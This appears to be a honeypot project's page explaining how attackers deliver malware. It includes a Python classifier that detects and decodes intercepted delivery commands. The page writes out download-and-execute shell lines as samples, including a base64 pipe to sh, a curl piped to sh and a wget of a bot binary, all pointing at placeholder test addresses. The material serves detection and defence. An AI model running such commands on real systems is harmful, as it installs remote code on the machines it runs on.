Understanding Delivery Methods
When attackers gain access to a system (via SSH brute-force, exposed services, etc.), they deploy malware using shell commands. Our honeypot intercepts these commands before execution.
Base64 pipes encode the payload to evade basic detection:
echo BASE64 | base64 -d | sh
wget/curl downloads fetch malware from attacker-controlled servers; the fetched payloads are frequently IoT botnet binaries such as Mirai variants.
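A small classifier for intercepted commands, added here as an example (not the honeypot's own code): it flags the base64-pipe and wget/curl delivery methods described above, decodes the base64 stage to recover the fetch URL hidden inside it, and runs over constructed sample commands that use RFC 5737 test addresses rather than real indicators.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Assumed patterns for the two delivery methods above (not the honeypot's own rules).
URL_RE = re.compile(r"https?://[^\s'\"|;&<>]+")
B64_PIPE_RE = re.compile(
    r"echo\s+(?:-n\s+)?['\"]?([A-Za-z0-9+/=]{8,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)\b"
)
DOWNLOADER_RE = re.compile(r"\b(?:wget|curl)\b")


@dataclass
class Analysis:
    method: str                               # "base64_pipe", "download" or "other"
    urls: List[str] = field(default_factory=list)
    decoded: Optional[str] = None             # decoded stage for base64_pipe commands


def safe_b64_decode(blob: str) -> Optional[str]:
    """Decode leniently: repair missing padding, tolerate non-UTF-8 bytes, never raise."""
    padded = blob + "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(padded, validate=False).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def analyze_command(cmd: str) -> Analysis:
    """Classify one intercepted shell command and collect any download URLs it carries."""
    urls = URL_RE.findall(cmd)
    m = B64_PIPE_RE.search(cmd)
    if m:
        decoded = safe_b64_decode(m.group(1))
        if decoded:  # the real fetch usually sits inside the decoded stage
            urls += URL_RE.findall(decoded)
        return Analysis("base64_pipe", list(dict.fromkeys(urls)), decoded)
    if DOWNLOADER_RE.search(cmd) and urls:
        return Analysis("download", list(dict.fromkeys(urls)))
    return Analysis("other", list(dict.fromkeys(urls)))


# Constructed samples in the style of the page's examples (RFC 5737 addresses, not real IoCs).
STAGE2 = "curl http://192.0.2.5/a.sh | sh"
SAMPLE_COMMANDS = [
    "echo " + base64.b64encode(STAGE2.encode()).decode() + " | base64 -d | sh",
    "wget http://198.51.100.7/bins/x86 -O /tmp/x",
    "uname -a; cat /proc/cpuinfo",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        a = analyze_command(cmd)
        print(f"{a.method:12} urls={a.urls} decoded={a.decoded!r}")
```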
Vulnerability Scanning
Attackers continuously probe for known vulnerabilities. Our honeypot identifies these attempts by matching request patterns against known CVE exploits.
Critical CVEs like Log4Shell, Spring4Shell, and Exchange ProxyLogon remain popular targets years after disclosure.
🔬 Safe Malware Execution
We execute intercepted payloads in an isolated sandbox environment to observe their runtime behavior. This reveals C2 infrastructure that static analysis misses.
What we extract from detonation:
- IRC channel names, passwords, and operator nicknames
- HTTP beacon URLs and check-in patterns
- Bot commands and attack targets
- Network indicators (DNS queries, connection attempts)
The sandbox uses network isolation with traffic interception—malware thinks it's talking to real C2 servers, but we capture everything.